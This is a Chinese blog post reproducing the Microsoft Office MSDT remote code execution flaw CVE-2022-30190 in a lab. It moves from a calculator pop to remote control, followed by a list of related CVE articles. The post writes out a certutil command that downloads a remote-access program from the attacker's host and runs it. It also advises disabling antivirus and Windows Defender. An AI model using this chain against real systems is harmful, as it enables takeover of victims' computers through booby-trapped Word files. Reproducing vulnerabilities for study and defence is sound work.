office CVE-2022-30190 RCE 复现

已于 2024-03-08 17:50:02 修改
阅读量368 收藏 1
点赞数
文章标签: web安全 网络 安全
于 2023-07-18 10:14:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_69775412/article/details/131781049
版权

简介:
当用户点击word等应用程序时,会使用URL协议调用MSDT,随即启动msdt.exe程序造成远程代码执行漏洞。简单来说就是攻击者可以恶意构造一个word文档,诱骗受害者点击,从而导致系统被黑。

0x01 环境部署

1. 测试版本
Microsoft Office LTSC 专业增强版 2021

2. 测试系统
windows 10 教育版

0x02 尝试执行calc弹出计算器

1. 利用脚本生成恶意word文件。

此时当前目录下会生成一个clickmeq.docx的带有恶意请求的word文件。

2. 本机开启监听,受害者在打开word的一瞬间会访问本机的恶意文件。

3. 将该word文件复制到虚拟机打开。

可以看到打开word的同时,系统执行了calc命令打开了计算器。

0x03 尝试获取系统权限

1. 利用大灰狼生成远控程序,将程序放在我们待会要监听的目录下。

2. 利用脚本生成恶意word文件,不过此时携带的命令就不是calc了。

certutil -urlcache -split -f http://192.168.2.1/server.exe c:\\server.exe & c:\\server.exe

上面这串命令的意思就是利用windows自带的命令certutil远程下载本地远控程序到C盘根目录并立即执行。

 

3. 先将文件复制到虚拟机并打开,随后本机开启监听服务 

 ​​​​​​​

可以看到主机已经上线

可以执行系统命令

注意事项:

  1. 由于没有做相关的免杀处理,所以需要把杀软以及windows Defender 关掉。
  2. 可以尝试其他版本的Office版本。
  3. 可以尝试其他下载命令,例如wget、curl等windows下载命令。
  4. 目前win10测试可以,其他系统也可以尝试下。
阿一网络安全
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Windows支持诊断工具(MSDT)远程代码执行漏洞(CVE-2022-30190)分析复现/修复
hongduilanjun的博客
06-08 3377
Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability对应的cveCVE-2022-30190,其能够在非管理员权限、禁用宏且在windows defender的情况下绕过防护,达到上线的效果。这里我们不对漏洞原理做过多的阐述(因为太菜),主要是进行漏洞的复现。在这里笔者只测试了如下版本能够适用,对于Office的 Insider 和 Current 和版本无法进行利用Microsoft Of
CVE-2022-30190(follina):Microsoft诊断工具(MSDT)远程代码执行漏洞复现(超级详细)
aihiglh的博客
06-15 3692
CVE-2022-30190复现与使用,由一位中学生独自编写(第一次写文章),干货较多,欢迎收藏和讨论交流
CVE-2022-30190 漏洞复现
weixin_53884648的博客
11-10 5978
通过exp实现了对微软目前存在的office-word-2016的成功复现
远程代码执行漏洞(CVE-2022-30190
weixin_47623655的博客
03-30 355
近期发现了一项关于 Microsoft Support Diagnostic Tool (MSDT) 的远程代码执行漏洞,该漏洞被命名为CVE-2022-30190。在此漏洞的攻击中,攻击者可以利用漏洞远程执行代码,从而实现对受影响系统的完全控制。本文将对CVE-2022-30190进行深入的分析。CVE-2022-30190漏洞是一项非常危险的远程代码执行漏洞,攻击者可以利用该漏洞来执行任意代码,并最终控制受感染系统。由于CVE-2022-30190漏洞的严重性,任何未受影响的系统都可能受到攻击。
Windows支持诊断工具(MSDT)远程代码执行漏洞:CVE-2022-30190学习及复现
加油~
08-17 4244
Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability对应的cve编号为CVE-2022-30190,其能够在非管理员权限、禁用宏且在windows defender开启的情况下绕过防护,达到上线的效果。
CVE-2022-30190分析以及复现和POC利用 //Microsoft Office MSDT 远程代码执行漏洞
热门推荐
Ba1_Ma0的博客
06-09 1万+
在微软官方的介绍里,是从 Word 等调用应用程序使用 URL 协议调用 MSDT 时存在远程执行代码漏洞。成功利用此漏洞的攻击者可以使用调用应用程序的权限运行任意代码。意思是恶意 Word 文档可以使用远程模板功能从远程服务器获取 HTML 文件,并且 HTML 代码可以使用 Microsoft 的 MS-MSDT URI 协议方案来加载其他代码并执行 PowerShell 代码与其他的漏洞不同,要利用此漏洞,攻击者只需要用户打开恶意文档即可,保存为RTF文件后,用户只是预览恶意文件,不用单击或者双击恶意
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞:CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
春秋云境 CVE-2022-4230 夺旗
最新发布
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
CVE-2022-30190 MSDT远程代码执行漏洞复现
热爱学习,喜欢折腾!
09-29 1021
Microsoft Office 是由 Microsoft (微软)公司开发的一套办公软件套装。常用组件有 Word、Excel、PowerPoint 等。Microsoft Office 存在远程代码执行漏洞,攻击者可通过恶意 Office 文件中远程模板功能从服务器获取恶意 HTML 文件,通过 'ms-msdt' URI 来执行恶意 PowerShell 代码。
CVE-2022-30190:Microsoft Office MSDT Rce漏洞
冬的博客
06-09 1412
MSDT(Microsoft Support Diagnostics Tool,微软支持诊断工具)是一个Windows实用程序,用于排除故障并收集诊断数据以供专业人员分析和解决问题。攻击者可通过恶意 Office 文件中远程模板功能从服务器获取恶意 HTML 文件,通过 'ms-msdt' URI 来执行恶意 PowerShell 代码。...
微软安全漏洞CVE-2022-30190
bpqd2008的专栏
06-05 429
微软安全漏洞CVE-2022-30190
CVE-2022-30190:Microsoft office MSDT 代码执行漏洞
zkaqlaoniao的博客
04-18 812
该漏洞首次发现在2022 年 5 月 27 日,由白俄罗斯的一个 IP 地址上传。恶意文档从 Word 远程模板功能从远程 Web 服务器检索 HTML 文件,通过 ms-msdt MSProtocol URI方法来执行恶意PowerShell代码。感染过程利用 Windows 程序 msdt.exe,该程序用于运行各种 Windows 疑难解答程序包。此工具的恶意文档无需用户交互即可调用它。导致在宏被禁用的情况下,恶意文档依旧可以使用ms-msdtURI执行任意PowerShell代码。
Microsoft OfficeCVE-2017-11882、CVE-2022-30190) 漏洞复现
oiadkt的博客
04-23 601
Microsoft OfficeCVE-2017-11882、CVE-2022-30190) 漏洞复现
MICROSOFT OFFICE MSDT操作系统命令注入漏洞(CVE-2022-30190
huayimy的博客
11-23 1258
MICROSOFT OFFICE MSDT操作系统命令注入漏洞(CVE-2022-30190)输入技术支持人员提供的密钥
cve-2022-30190原理讲解
08-30
CVE-2022-30190是一项关于软件漏洞的公共漏洞编号,具体描述如下: 该漏洞是由于软件在处理用户输入时存在缺陷而造成的。它的原理主要涉及到软件的输入验证和处理机制。 在正常情况下,软件应该对用户输入的数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值